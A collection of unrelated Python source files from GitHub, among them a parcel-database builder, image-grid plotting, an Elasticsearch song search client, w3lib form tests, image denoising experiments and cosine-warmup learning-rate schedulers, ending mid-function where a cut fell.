INSERT INTO parcels (apn, location, zipcode, geo_lat, geo_lon, use_code, lot_size_sqft, building_size_sqft, building_bed_count, building_bath_count, building_stories_count, building_units_count, building_age)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
"""
def flatten(l):
    """Recursively flatten arbitrarily nested lists into one flat list.

    (Converted from the original `flatten = lambda ...` assignment -- PEP 8
    recommends `def` for named functions; behavior is unchanged.)
    """
    if isinstance(l, list):
        return sum(map(flatten, l), [])
    return [l]
def run():
    """
    Convert the Butte county parcels GeoJSON into a SQLite database.

    Streams the GeoJSON line by line (one feature per line), computes each
    parcel's polygon centroid, and inserts one row per APN into `parcels`,
    skipping duplicates and records without an APN or zipcode.
    """
    conn = None
    try:
        db_file = os.path.join(DATA_DIR, 'butte_parcel.db')
        print('Opening {}'.format(db_file))
        conn = sqlite3.connect(db_file)
        c = conn.cursor()
        c.execute(sql_create_parcel_table)
        with open(GEOJSON_FILE) as f_in:
            count = 0
            for line in f_in:
                count += 1
                if count < 6:
                    # Skip geojson cruft left by conversion
                    continue
                try:
                    json_to_parse = line.strip()
                    if json_to_parse.endswith(','):
                        json_to_parse = json_to_parse[:-1]
                    record = json.loads(json_to_parse)
                except json.JSONDecodeError:
                    # Narrowed from a bare `except:` so KeyboardInterrupt /
                    # SystemExit are no longer swallowed.
                    print('-> could not parse JSON on line %d' % (count,))
                    continue
                props = record['properties']
                formatted_apn = props['SiteAPN']
                if not formatted_apn:
                    continue
                if not record['geometry'] or not record['geometry']['coordinates']:
                    print('-> skip')
                    continue
                # There is definitely a more correct way to do this.
                flat_coords = [[xyz[0], xyz[1]] for coords in record['geometry']['coordinates'] for xyz in coords]
                flat_coords = flatten(flat_coords)
                coords = zip(flat_coords[0::2], flat_coords[1::2])
                try:
                    centroid = list(Polygon(coords).centroid.coords)[0]
                except Exception:
                    # Shapely can raise several error types for degenerate
                    # rings; narrowed from a bare `except:`.
                    print('-> could not find centroid')
                    continue
                # check if id already exists
                c.execute(sql_select_apn_from_parsed, (formatted_apn,))
                (exists_check,) = c.fetchone()
                if exists_check > 0:
                    continue
                if not props['SiteZip']:
                    continue
                insert_record = (
                    formatted_apn,
                    '{}\n{}'.format(props['SiteAddr'], props['SiteCity']),
                    props['SiteZip'],
                    centroid[1],
                    centroid[0],
                    props['UseCode'],
                    props['LotSizeSF'],
                    props['BuildingSF'],
                    props['Bedrooms'],
                    props['Bathrooms'],
                    props['Stories'],
                    props['Units'],
                    props['YrBuilt']
                )
                c.execute(sql_insert_parcel_from_parsed, insert_record)
        # Single commit once the whole file has been processed.
        conn.commit()
        print("inserts: {}".format(c.lastrowid))
    except Error as e:
        print(e)
    finally:
        if conn:
            conn.close()


if __name__ == '__main__':
    run()
| typpo/ca-property-tax | scrapers/butte/create_parcels_db.py | create_parcels_db.py | py | 4,941 | python | en | code | 89 | github-code | 36 |
5668664706 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import numpy as np
import sklearn.metrics as metrics
import seaborn as sns
from mosaic import features
from mosaic import contexts
from mosaic import image_io
from mosaic import plots
from mosaic import data_utils
from mosaic.grid.image_grid import images_to_grid
__all__ = ['scatter_grid']
def images_to_scatter_grid(images, x_var, y_var, padding=None, **kwargs):
    """Creates a grid plot from a scatter plot.

    Each image is snapped to the nearest free cell of an evenly spaced
    sqrt(n) x sqrt(n) grid via a greedy nearest-neighbor assignment.

    Parameters
    ----------
    images : list of length [n_samples,]
        A List of PIL Image objects. All images must be
        the same shape NxWx3.
    x_var : np.array of shape [n_samples,]
        The x-coordinate in euclidean space.
    y_var : np.array of shape [n_samples,]
        The y-coordinate in euclidean space.
    padding : int, optional
        The padding between images in the grid.

    Returns
    -------
    A properly shaped width x height x 3 PIL Image.
    """
    # scale the variables between 0-1 (subtract off min?)
    # NOTE(review): the return values are discarded, so this only works if
    # features.minmax_scale modifies its argument in place -- confirm.
    features.minmax_scale(x_var)
    features.minmax_scale(y_var)
    xy = np.c_[x_var, y_var]
    # make a grid of evenly spaced points on the grid.
    # The grid is of size sqrt(n_samples) x sqrt(n_samples)
    grid_size = int(np.ceil(np.sqrt(len(images))))
    grid_1d = np.linspace(0, 1, grid_size)
    grid_2d = np.dstack(np.meshgrid(grid_1d, grid_1d)).reshape(-1, 2)
    # distances between the evenly spaced grid and the points
    dist = metrics.euclidean_distances(grid_2d, xy)
    # determine order based on nearest neighbors: each grid cell greedily
    # claims the closest sample that has not been claimed yet.
    image_order = []
    for i in range(grid_2d.shape[0]):
        index = np.argmin(dist[i, :])
        image_order.append(index)
        dist[:, index] = np.inf  # set to inf so we don't pick this point again
    images = [images[index] for index in image_order]
    grid = images_to_grid(images, padding=padding)
    return plots.pillow_to_matplotlib(grid, **kwargs)
def scatter_grid(x, y,
                 images=None,
                 data=None,
                 hue=None,
                 image_dir='',
                 image_size=None,
                 padding=None,
                 n_jobs=1,
                 **kwargs):
    """Draw a plot ordering images in a regularly spaced 2-d grid
    based on their distance in the x-y plane. The distance between
    points is assumed to be euclidean.

    Parameters
    ----------
    x, y : str or array-like
        Data or names of variables in `data`.
        These variables correspond to the x-y coordinates
        in the euclidean space.
    images : str or array-like
        Image arrays or names of the column pointing to the
        image paths within `data`.
    data : pd.DataFrame
        Pandas dataframe holding the dataset.
    hue : str or array-like
        Data or the name of the variable to use to color
        the individual images on the grid.
    image_dir : str (default='')
        The location of the image files on disk.
    image_size : int
        The size of each image in the scatter plot.
    padding : int, optional
        The padding between images in the grid.
    n_jobs : int (default=1)
        The number of parallel workers to use for loading
        the image files.

    Returns
    -------
    A properly shaped NxWx3 image with any necessary padding.

    Examples
    --------
    Create a grid plot with hue labels.

    .. plot:: ../examples/scatter_grid.py
    """
    x_var = data_utils.get_variable(data, x)
    y_var = data_utils.get_variable(data, y)

    # TODO (seaborn is only required for a color palette. Remove this)
    if hue is not None:
        # With a hue variable: load raw arrays, tint each image by its
        # hue class using a husl palette, then convert to PIL images.
        images = data_utils.get_images(
            data, images,
            image_dir=image_dir,
            as_image=False,
            image_size=image_size,
            n_jobs=n_jobs)
        hue = data_utils.get_variable(data, hue)
        values, value_map = np.unique(hue, return_inverse=True)
        palette = sns.husl_palette(len(values))
        images = [features.color_image(img, hue=palette[val]) for
                  img, val in zip(images, value_map)]
        images = [image_io.to_pillow_image(img) for img in images]
    else:
        # load images directly as PIL images (no tinting needed)
        images = data_utils.get_images(
            data, images,
            image_dir=image_dir,
            as_image=True,
            image_size=image_size,
            n_jobs=n_jobs)

    return images_to_scatter_grid(images, x_var, y_var, padding=padding, **kwargs)
| joshloyal/Mosaic | mosaic/grid/scatter_grid.py | scatter_grid.py | py | 4,542 | python | en | code | 0 | github-code | 36 |
43471363833 | import pandas as pd
import numpy as np
# from sklearn.linear_model import LogisticRegression
# from omegaconf import DictConfig, OmegaConf
from loguru import logger
import joblib
import click
# from dataclasses import dataclass
# from hydra.core.config_store import ConfigStore
# from sklearn.pipeline import Pipeline
# from src.features.transformers import SqrTransformer
# from omegaconf import DictConfig, OmegaConf, MISSING
# from src.models.train_model import Config, RF, LogReg, ModelType
# CLI entry point: loads a pickled sklearn-style model with joblib, predicts
# labels for a CSV dataset, and writes the predictions to `output` as CSV.
@click.command()
@click.option(
    "--model",
    help="Pretrained model path.",
    type=click.Path(exists=True),
    required=True,
)
@click.option(
    "--dataset",
    help="Input dataset in csv format.",
    type=click.Path(exists=True),
    required=True,
)
@click.option(
    "--output",
    help="Output file with predicted labels.",
    type=click.Path(),
    required=True,
)
def main(model: str, dataset: str, output: str) -> None:
    logger.info('Reading data')
    df = pd.read_csv(dataset)
    # Drop the target column if present so the feature matrix matches training.
    if 'condition' in df.columns:
        df = df.drop(['condition'], axis=1)
    # with open(model, 'rb') as file:
    #     model = pickle.load(file)
    # logger.info('Model loaded')
    # NOTE(review): `model` (a path) is rebound to the loaded estimator here.
    model = joblib.load(model)
    y_pred = model.predict(df)
    logger.info('Saving results')
    np.savetxt(output, y_pred, delimiter=",")


if __name__ == "__main__":
    main()
| made-mlops-2022/mlops-andrey-talyzin | ml_project/src/models/predict_model.py | predict_model.py | py | 1,397 | python | en | code | 0 | github-code | 36 |
38591539805 | from elasticsearch import Elasticsearch
from search import search_user_query
class ESClient:
    """
    Thin wrapper around a local Elasticsearch node holding the
    "sinhala-songs-corpus" index.
    """

    def __init__(self):
        # NOTE(review): node address is hard-coded; consider making it configurable.
        self.es = Elasticsearch("http://localhost:9200")

    def extract_songs(self, resp):
        """Return the list of _source documents from a search response."""
        # (Replaces the original index-based loop with a comprehension.)
        return [hit["_source"] for hit in resp["hits"]["hits"]]

    def get_all_songs(self):
        """Return every song in the corpus via a match_all query."""
        resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"match_all": {}}})
        return self.extract_songs(resp)

    def advanced_search(self, req_body):
        """
        Boolean AND search over every non-empty field in req_body; each field
        is matched against its ".case_insensitive_and_inflections" sub-field.
        """
        filled_keys = {k: v for k, v in req_body.items() if v}
        must_list = [
            {"match": {k + ".case_insensitive_and_inflections": req_body[k]}}
            for k in filled_keys
        ]
        resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"bool": {"must": must_list}}})
        return self.extract_songs(resp)

    def get_logical_combinations(self, req_body):
        """
        Two-field search combined with the "and" / "or" / "not" operation
        given in req_body["operation"].
        """
        clause_1 = {"match": {req_body["key1"] + ".case_insensitive_and_inflections": req_body["value1"]}}
        clause_2 = {"match": {req_body["key2"] + ".case_insensitive_and_inflections": req_body["value2"]}}
        resp = None
        if req_body["operation"] == "and":
            resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"bool": {"must": [clause_1, clause_2]}}})
        elif req_body["operation"] == "or":
            resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"bool": {"should": [clause_1, clause_2]}}})
        elif req_body["operation"] == "not":
            resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"bool": {"must": clause_1, "must_not": clause_2}}})
        # NOTE(review): an unrecognized operation leaves resp as None, so
        # extract_songs raises TypeError -- behavior preserved from original.
        return self.extract_songs(resp)

    def regular_search(self, req_body):
        """Free-text search, delegated to search_user_query."""
        resp = search_user_query(req_body["query"], self.es)
        return self.extract_songs(resp)
import datetime as dt

# Load persisted defaults: the next claim number and the current HST rate.
with open("def.dat", "r") as f:
    CLAIM_NUM = int(f.readline())
    # BUG FIX: the original called `float(f.readline)` -- missing call
    # parentheses -- which passed the bound method to float() and crashed
    # with TypeError before the program could run.
    HST_RATE = float(f.readline())

CURR_DATE = dt.datetime.now()

while True:
    emp_name = input("Employee name: ")
    emp_num = input("Employee number: ")
    location = input("Location: ")

    # TODO: the remaining claim fields are hard-coded test values.
    start_date = "2023-11-06"
    end_date = "2023-11-09"
    num_days = 3
    car_status = "O"

    num_km = 0
    if car_status == "O":
        num_km = 1400

    # Per diem: $85/day for trips of 3 days or fewer, $100/day otherwise.
    if num_days <= 3:
        per_diem = num_days * 85.00
    else:
        per_diem = num_days * 100.00

    # Mileage: $0.10/km with own car ("O"), else $56.00/day allowance.
    if car_status == "O":
        mileage = num_km * 0.10
    else:
        mileage = num_days * 56.00

    claim_amt = per_diem + mileage
    taxes = claim_amt * HST_RATE
    claim_total = claim_amt + taxes

    print(f"Claim num: {CLAIM_NUM}")
    print(f"Employee num: {emp_num}")
    print(f"Employee name: {emp_name}")
    print(f"Location: {location}")
    print(f"Claim total: ${claim_total}")

    # Append this claim to claims.dat; `with` fixes the original's leaked
    # handle (the file was re-opened every iteration and never closed).
    with open("claims.dat", "a") as f:
        f.write(f"{CLAIM_NUM}, ")
        f.write(f"{str(CURR_DATE)}, ")
        f.write(f"{num_days}\n")

    CLAIM_NUM += 1
    print("Claim data written.")

    cont = input("Continue?: ").upper()
    if cont == "N":
        break

# Persist the updated defaults for the next run.
with open("def.dat", "w") as f:
    f.write(f"{CLAIM_NUM}\n")
    f.write(f"{HST_RATE}\n")

print("Thank you for using the claim processing program.")
| sweetboymusik/Python | Lesson 29/question.py | question.py | py | 1,411 | python | en | code | 0 | github-code | 36 |
15853176936 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import warnings
import unittest
from collections import OrderedDict
from w3lib.form import encode_multipart
class EncodeMultipartTest(unittest.TestCase):
    """Tests for w3lib.form.encode_multipart (multipart/form-data encoding)."""
    def test_encode_multipart(self):
        # Simple str key/value pair encodes as one form-data part.
        data = {'key': 'value'}
        with warnings.catch_warnings(record=True):
            body, boundary = encode_multipart(data)
        expected_body = (
            '\r\n--{boundary}'
            '\r\nContent-Disposition: form-data; name="key"\r\n'
            '\r\nvalue'
            '\r\n--{boundary}--'
            '\r\n'.format(boundary=boundary).encode('utf8')
        )
        self.assertEqual(body, expected_body)
    def test_encode_multipart_unicode(self):
        # Non-ASCII field names/values; bytes and text values mix in one body.
        # OrderedDict pins part order so the expected body is deterministic.
        data = OrderedDict([
            (u'ключ1', u'значение1'.encode('utf8')),
            (u'ключ2', u'значение2'),
        ])
        with warnings.catch_warnings(record=True):
            body, boundary = encode_multipart(data)
        expected_body = (
            u'\r\n--{boundary}'
            u'\r\nContent-Disposition: form-data; name="ключ1"\r\n'
            u'\r\nзначение1'
            u'\r\n--{boundary}'
            u'\r\nContent-Disposition: form-data; name="ключ2"\r\n'
            u'\r\nзначение2'
            u'\r\n--{boundary}--'
            u'\r\n'.format(boundary=boundary).encode('utf8')
        )
        self.assertEqual(body, expected_body)
    def test_encode_multipart_file(self):
        # (filename, bytes) tuple encodes as a file part with raw binary payload.
        # this data is not decodable using utf8
        data = {'key': ('file/name', b'\xa1\xa2\xa3\xa4\r\n\r')}
        with warnings.catch_warnings(record=True):
            body, boundary = encode_multipart(data)
        body_lines = [
            b'\r\n--' + boundary.encode('ascii'),
            b'\r\nContent-Disposition: form-data; name="key"; filename="file/name"\r\n',
            b'\r\n\xa1\xa2\xa3\xa4\r\n\r',
            b'\r\n--' + boundary.encode('ascii') + b'--\r\n',
        ]
        expected_body = b''.join(body_lines)
        self.assertEqual(body, expected_body)
    #def test_encode_multipart_int(self):
    #    data = {'key': 123}
    #    body, boundary = encode_multipart2(data)
    #    expected_body = (
    #        '\n--{boundary}'
    #        '\nContent-Disposition: form-data; name="key"\n'
    #        '\n123'
    #        '\n--{boundary}--'
    #        '\n'.format(boundary=boundary)
    #    )
    #    self.assertEqual(body, expected_body)
| bertucho/epic-movie-quotes-quiz | dialogos/build/w3lib/tests/test_form.py | test_form.py | py | 2,473 | python | en | code | 0 | github-code | 36 |
3458958897 |
class Solution(object):
    def majorityElement(self, nums):
        """
        Returns the element that appears more than len(nums) // 2 times.

        :type nums: List[int]
        :rtype: int

        Counts occurrences in a dict and returns as soon as an element
        crosses the majority threshold. Returns None implicitly if no
        majority element exists (the problem guarantees one does).
        """
        # Integer floor division replaces the original's int(len(nums) / 2).
        threshold = len(nums) // 2
        counts = {}
        for value in nums:
            counts[value] = counts.get(value, 0) + 1
            if counts[value] > threshold:
                return value
if __name__ == '__main__':
    # Quick manual check; 2 appears 5 of 9 times and is the majority element.
    # (Removed dataset-metadata junk that was fused onto the original line.)
    nums = [1, 2, 3, 2, 2, 2, 5, 4, 2]
    print(Solution().majorityElement(nums))
28451867185 | from rest_framework import serializers
from core.models import Tag,Ingredient
class TagSerializers(serializers.ModelSerializer):
    '''Serializer for Tag objects; id is server-assigned and read-only.'''

    class Meta:
        model = Tag
        fields = ('id', 'name')
        read_only_fields = ('id',)
class IngredientSerializer(serializers.ModelSerializer):
    '''Serializer for Ingredient objects; id is server-assigned and read-only.'''

    class Meta:
        model = Ingredient
        fields = ('id', 'name')
        # (Removed dataset-metadata junk fused onto the original last line.)
        read_only_fields = ('id',)
# Pizza-topping input loops -- exercises 7-4 and 7-6, three variants.
# The first two variants are kept below as commented-out reference solutions;
# only variant P3 (the `while True` / break form) is active.
# (Removed dataset-metadata junk that was fused onto the original first line.)
prompt="enter your pizza toppings: "
#exercise 7-4 & 7-6 P1 :
#x=""
#while x != "quit":
    #x=input(prompt)
    #if x == "quit":
        #print("thank you for ordering")
    #else:
        #print(x)
#exercise 7-6 P2:
#active = True
#while active:
    #x=input(prompt)
    #if (x == "quit"):
        #print("thank you for ordering")
        #active = False
    #else:
        #print(x)
#exercise 7-6 P3:
while True:
    x=input(prompt)
    if (x=="quit"):
        print("thank you for ordering")
        break
    else:
        print(x)
| BasselMalek/python-training-files | python_learning_projects/7_4_6_exercise.py | 7_4_6_exercise.py | py | 565 | python | en | code | 0 | github-code | 36 |
35127026935 | import os
import numpy as np
import pickle
from dataclasses import dataclass
import itertools
from multiprocessing import Pool
import PIL
from noise_reducers.grayscale_gibbs_noise_reducer import GrayscaleGibbsNoiseReducer
from noise_reducers.grayscale_gradient_noise_reducer import GrayscaleGradientNoiseReducer
from noise_reducers import image_utils
@dataclass
class Experiment(object):
    """Configuration for one denoising experiment."""
    experiment_name: str  # name of the image folder under IMAGES_PATH
    noise_level: float  # noise prior passed to the reducers -- presumably flip probability; confirm
# Experiment configurations to run (folder names suggest 800px images with
# 10% / 20% flipped-pixel noise -- confirm against the data generator).
EXPERIMENTS = [
    Experiment(experiment_name="size800_noise10_flipped", noise_level=0.1),
    Experiment(experiment_name="size800_noise20_flipped", noise_level=0.2),
]
# Root folder holding the per-experiment image directories.
IMAGES_PATH = "../grayscale_images"
# Number of (ground truth, observation) pairs per experiment.
IMAGES_PER_EXPERIMENT = 20
# Total sampler iterations per image, and how often metrics are evaluated.
ITERATIONS_PER_EXPERIMENT = 300_000
ITERATIONS_PER_EVALUATION = 6000
@dataclass
class ImagePair(object):
    """A ground-truth image and its noisy observation, as numpy arrays."""
    image_id: int
    ground_truth: np.ndarray
    observation: np.ndarray
def get_image_pairs_to_evaluate(experiment_name):
    """Load the (ground truth, noisy observation) pairs for one experiment."""
    images_path = os.path.join(IMAGES_PATH, experiment_name)
    return [
        ImagePair(
            image_id=image_id,
            ground_truth=image_utils.load_grayscale_image_as_numpy_array(
                os.path.join(images_path, f"image_{image_id}_ground_truth.png")),
            observation=image_utils.load_grayscale_image_as_numpy_array(
                os.path.join(images_path, f"image_{image_id}_observation.png")),
        )
        for image_id in range(IMAGES_PER_EXPERIMENT)
    ]
def run_with_reducer(reducer, experiment_name, storage_folder):
    """
    Run `reducer` over every image pair of an experiment, saving each denoised
    image as a PNG plus a pickle of the reducer's average statistics.
    """
    os.makedirs(storage_folder, exist_ok=True)
    for image_pair in get_image_pairs_to_evaluate(experiment_name):
        reduction_result = reducer.reduce_noise(
            original_image=image_pair.ground_truth, observation=image_pair.observation,
        )
        # Convert the float result back to an 8-bit grayscale PNG.
        reduced_image = PIL.Image.fromarray(reduction_result.reduced_image.astype(np.uint8))
        reduced_image.save(os.path.join(storage_folder, f"reduced_image_{image_pair.image_id}.png"), format="PNG")
    # Statistics accumulated across all images processed by this reducer.
    with open(os.path.join(storage_folder, "average_statistics.pickle"), mode="wb") as file_stream:
        pickle.dump(reducer.average_statistics, file_stream)
def run_with_gibbs_reducer(experiment):
    """Run the Gibbs-sampling reducer on one experiment (fixed hyperparameters)."""
    print(f"Gibbs sampling for experiment {experiment.experiment_name} started!")
    reducer = GrayscaleGibbsNoiseReducer(
        noise_level_prior=experiment.noise_level, observation_strength=1.0, coupling_strength=4.0,
        iterations_count=ITERATIONS_PER_EXPERIMENT, iterations_per_evaluation=ITERATIONS_PER_EVALUATION,
    )
    # Output folder name encodes the noise level as a percentage.
    storage_folder = os.path.join(
        IMAGES_PATH, experiment.experiment_name, f"grayscale_gibbs_reducer_{round(experiment.noise_level * 100)}"
    )
    run_with_reducer(reducer, experiment.experiment_name, storage_folder)
    print(f"Gibbs sampling for experiment {experiment.experiment_name} done!")
def run_with_gradient_reducer(experiment):
    """Run the gradient-based reducer on one experiment (fixed hyperparameters)."""
    print(f"Gradient-based sampling for experiment {experiment.experiment_name} started!")
    reducer = GrayscaleGradientNoiseReducer(
        noise_level_prior=experiment.noise_level, observation_strength=1.0, coupling_strength=4.0, temperature=2.0,
        iterations_count=ITERATIONS_PER_EXPERIMENT, iterations_per_evaluation=ITERATIONS_PER_EVALUATION,
    )
    # Output folder name encodes the noise level as a percentage.
    storage_folder = os.path.join(
        IMAGES_PATH, experiment.experiment_name, f"grayscale_gradient_reducer_{round(experiment.noise_level * 100)}"
    )
    run_with_reducer(reducer, experiment.experiment_name, storage_folder)
    print(f"Gradient-based sampling for experiment {experiment.experiment_name} done!")
def run_with_reducer_type(experiment, reducer_type):
    """Dispatch `experiment` to the reducer implementation named by `reducer_type`.

    Raises:
        ValueError: if `reducer_type` is neither "gibbs" nor "gradient".
    """
    if reducer_type not in ("gibbs", "gradient"):
        raise ValueError("Invalid type of reducer")
    if reducer_type == "gibbs":
        run_with_gibbs_reducer(experiment)
    else:
        run_with_gradient_reducer(experiment)
def run_script():
    """Run every experiment with both reducer types across 6 worker processes.

    Jobs are ordered: all Gibbs runs first, then all gradient runs, matching
    the (experiment, reducer_type) signature of run_with_reducer_type.
    """
    jobs = [
        (experiment, reducer_type)
        for reducer_type in ("gibbs", "gradient")
        for experiment in EXPERIMENTS
    ]
    with Pool(processes=6) as pool:
        pool.starmap(run_with_reducer_type, jobs)


if __name__ == "__main__":
    run_script()
| Dawidsoni/noise-reduction | noise-reduction/generate_grayscale_statistics.py | generate_grayscale_statistics.py | py | 4,224 | python | en | code | 0 | github-code | 36 |
70511120745 | import os
# Build a JS file mapping image ids to facial-feature points parsed from the
# exported feature files (one "x,y" pair per line).  Files whose names contain
# a space are treated as invalid exports and deleted.
FEATURE_LOC = './data/jaffe_test_features'
files = os.listdir(FEATURE_LOC)
features = {}
for filename in files:
    path = '/'.join([FEATURE_LOC, filename])
    # Remove all files with a space in them
    if ' ' in filename:
        os.remove(path)
        continue
    # Use a context manager so the file handle is always closed
    # (the original leaked one handle per feature file).
    with open(path) as f:
        point_arr = []
        for line in f:
            # Each line holds one comma-separated "x,y" coordinate pair.
            split_arr = line.split(',')
            point = [float(split_arr[0]), float(split_arr[1])]
            point_arr.append(point)
    # Filenames look like "<prefix>_<id>.<ext>"; the numeric id keys the dict.
    filename_arr = filename.split('_')
    filename_arr_back = filename_arr[1].split('.')
    features[int(filename_arr_back[0])] = point_arr
labels = 'var jaffe_test_features = ' + repr(features) + ';\n'
# Write via a context manager so the output is flushed and closed reliably.
with open('./data/processed/jaffe_test_features.js', 'w') as out_file:
    out_file.write(labels)
| Hansenq/face-emoticon | process_features.py | process_features.py | py | 771 | python | en | code | 2 | github-code | 36 |
14582084682 | # -*- coding: utf-8 -*-
# @Author : Devin Yang(pistonyang@gmail.com), Gary Lai (glai9665@gmail.com)
__all__ = ['CosineWarmupLr', 'get_cosine_warmup_lr_scheduler', 'get_layerwise_decay_params_for_bert']
from math import pi, cos
from torch.optim.optimizer import Optimizer
from torch.optim.lr_scheduler import LambdaLR
class Scheduler:
    """Minimal lr-scheduler base class with (de)serialization helpers.

    Subclasses must provide __init__ and get_lr; state_dict/load_state_dict
    round-trip every attribute except the wrapped optimizer.
    """

    def __init__(self):
        raise NotImplementedError

    def get_lr(self):
        raise NotImplementedError

    def state_dict(self):
        """Returns the state of the scheduler as a :class:`dict`.

        It contains an entry for every variable in self.__dict__ which
        is not the optimizer.
        """
        state = dict(self.__dict__)
        state.pop('optimizer', None)
        return state

    def load_state_dict(self, state_dict):
        """Loads the schedulers state.

        Arguments:
            state_dict (dict): scheduler state. Should be an object returned
                from a call to :meth:`state_dict`.
        """
        self.__dict__.update(state_dict)
class CosineWarmupLr(Scheduler):
    """Cosine lr decay function with warmup.

    Lr warmup is proposed by `
    Accurate, Large Minibatch SGD:Training ImageNet in 1 Hour`
    `https://arxiv.org/pdf/1706.02677.pdf`

    Cosine decay is proposed by `
    Stochastic Gradient Descent with Warm Restarts`
    `https://arxiv.org/abs/1608.03983`

    Args:
        optimizer (Optimizer): optimizer of a model.
        batches (int): batches per epoch.
        epochs (int): epochs to train.
        base_lr (float): init lr.
        target_lr (float): minimum(final) lr.
        warmup_epochs (int): warmup epochs before cosine decay.
        warmup_lr (float): warmup starting lr.
        last_iter (int): init iteration; -1 means a fresh (non-resumed) run.

    Attributes:
        total_iters (int): number of iterations of all epochs.
        total_warmup_iters (int): number of iterations of all warmup epochs.
    """
    def __init__(self,
                 optimizer,
                 batches: int,
                 epochs: int,
                 base_lr: float,
                 target_lr: float = 0,
                 warmup_epochs: int = 0,
                 warmup_lr: float = 0,
                 last_iter: int = -1):
        if not isinstance(optimizer, Optimizer):
            raise TypeError('{} is not an Optimizer'.format(type(optimizer).__name__))
        self.optimizer = optimizer
        if last_iter == -1:
            # Fresh run: remember each group's starting lr so state can be restored.
            for group in optimizer.param_groups:
                group.setdefault('initial_lr', group['lr'])
            last_iter = 0
        else:
            # Resuming: every param group must already carry its initial lr.
            for i, group in enumerate(optimizer.param_groups):
                if 'initial_lr' not in group:
                    raise KeyError("param 'initial_lr' is not specified "
                                   "in param_groups[{}] when resuming an optimizer".format(i))
        self.baselr = base_lr
        self.learning_rate = base_lr
        self.total_iters = epochs * batches
        self.targetlr = target_lr
        self.total_warmup_iters = batches * warmup_epochs
        self.total_cosine_iters = self.total_iters - self.total_warmup_iters
        self.total_lr_decay = self.baselr - self.targetlr
        self.warmup_lr = warmup_lr
        self.last_iter = last_iter
        # Apply the lr for the starting iteration immediately.
        self.step()

    def get_lr(self):
        """Compute the lr for the current iteration: linear warmup, then cosine decay."""
        if self.last_iter < self.total_warmup_iters:
            # Linear ramp from warmup_lr up to base_lr over the warmup iterations.
            return self.warmup_lr + \
                   (self.baselr - self.warmup_lr) * self.last_iter / self.total_warmup_iters
        else:
            # Cosine anneal from base_lr down to target_lr over the remaining iterations.
            cosine_iter = self.last_iter - self.total_warmup_iters
            cosine_progress = cosine_iter / self.total_cosine_iters
            return self.targetlr + self.total_lr_decay * \
                   (1 + cos(pi * cosine_progress)) / 2

    def step(self, iteration=None):
        """Update status of lr.

        Args:
            iteration(int, optional): now training iteration of all epochs.
                Usually no need to set it manually.
        """
        if iteration is None:
            iteration = self.last_iter + 1
        self.last_iter = iteration
        self.learning_rate = self.get_lr()
        # Push the freshly computed lr into every param group of the optimizer.
        for param_group in self.optimizer.param_groups:
            param_group['lr'] = self.learning_rate
def get_cosine_warmup_lr_scheduler(optimizer: Optimizer,
                                   batches_per_epoch: int,
                                   epochs: int,
                                   warmup_epochs: int = 0,
                                   last_epoch: int = -1):
    """Similar to CosineWarmupLr, with support for different learning rate for different parameter groups as well as better compatibility with current PyTorch API

    Args:
        optimizer (Optimizer): optimizer of a model.
        batches_per_epoch (int): batches per epoch.
        epochs (int): epochs to train.
        warmup_epochs (int): warmup epochs before cosine decay.
        last_epoch (int): the index of the last epoch when resuming training.

    Example:
        ```
        batches_per_epoch = 10
        epochs = 5
        warmup_epochs = 1
        params = get_layerwise_decay_params_for_bert(model)
        optimizer = optim.SGD(params, lr=3e-5)
        lr_scheduler = get_cosine_warmup_lr_scheduler(optimizer, batches_per_epoch, epochs, warmup_epochs=warmup_epochs)
        ```
    """
    total_steps = epochs * batches_per_epoch
    # warmup params
    total_warmup_steps = batches_per_epoch * warmup_epochs
    # cosine params
    total_cosine_steps = total_steps - total_warmup_steps

    def lr_lambda(current_step):
        # LambdaLR multiplies each group's base lr by this factor every step.
        if current_step < total_warmup_steps:
            # Linear warmup from 0 up to the base lr.
            return current_step / total_warmup_steps
        if total_cosine_steps <= 0:
            # Warmup covers the whole schedule (warmup_epochs >= epochs):
            # hold the base lr instead of dividing by zero.
            return 1.0
        cosine_step = current_step - total_warmup_steps
        cosine_progress = cosine_step / total_cosine_steps
        return (1 + cos(pi * cosine_progress)) / 2

    return LambdaLR(optimizer, lr_lambda, last_epoch)
def get_differential_lr_param_group(param_groups, lrs):
    """Pair each parameter group with its own learning rate.

    Discriminative fine-tuning (Howard & Ruder 2018,
    https://arxiv.org/pdf/1801.06146.pdf) assigns different learning rates to
    different layers to stabilize training and speed up convergence.

    Args:
        param_groups: list of parameter groups (each a list of parameters).
        lrs: list of learning rates, one per parameter group, same order.
    Returns:
        A list of {'params': ..., 'lr': ...} dicts suitable for an optimizer.
    """
    assert len(param_groups) == len(lrs), f"expect the learning rates to have the same lengths as the param_group length, instead got {len(param_groups)} and {len(lrs)} as lengths respectively"
    return [{'params': group, 'lr': lr} for group, lr in zip(param_groups, lrs)]
def get_layerwise_decay_param_group(param_groups, top_lr=2e-5, decay=0.95):
    """Assign layer-wise decayed learning rates to parameter groups.

    The last (topmost) group gets `top_lr`; each group below it is scaled by
    one extra factor of `decay`, as in Sun et al. 2019
    (https://arxiv.org/abs/1905.05583), to improve convergence and prevent
    catastrophic forgetting.

    Args:
        param_groups: list of parameter groups, lowest layer first.
        top_lr: learning rate of the topmost group.
        decay: per-layer decay factor; decay == 1 gives every group the same lr.
    Returns:
        Parameter groups with per-group learning rates for an optimizer, e.g.
        `AdamW(get_layerwise_decay_param_group(groups, top_lr=2e-5), lr=2e-5)`.
    """
    depth = len(param_groups)
    lrs = [top_lr * decay ** (depth - 1 - i) for i in range(depth)]
    return get_differential_lr_param_group(param_groups, lrs)
def get_layerwise_decay_params_for_bert(model, number_of_layer=12, top_lr=2e-5, decay=0.95):
    """Build BERT optimizer parameter groups with layer-wise decayed lrs.

    Combines get_param_group_for_bert (one group per BERT layer) with
    get_layerwise_decay_param_group (decayed lrs, topmost layer highest),
    following Sun et al. 2019 (https://arxiv.org/abs/1905.05583).

    Args:
        model: your BERT model.
        number_of_layer: number of transformer layers the model has.
        top_lr: learning rate of the top layer.
        decay: per-layer decay factor; decay == 1 gives all layers the same lr.
    Returns:
        Parameter groups you can pass straight to an optimizer, e.g.
        `AdamW(get_layerwise_decay_params_for_bert(model), lr=2e-5)`.
    """
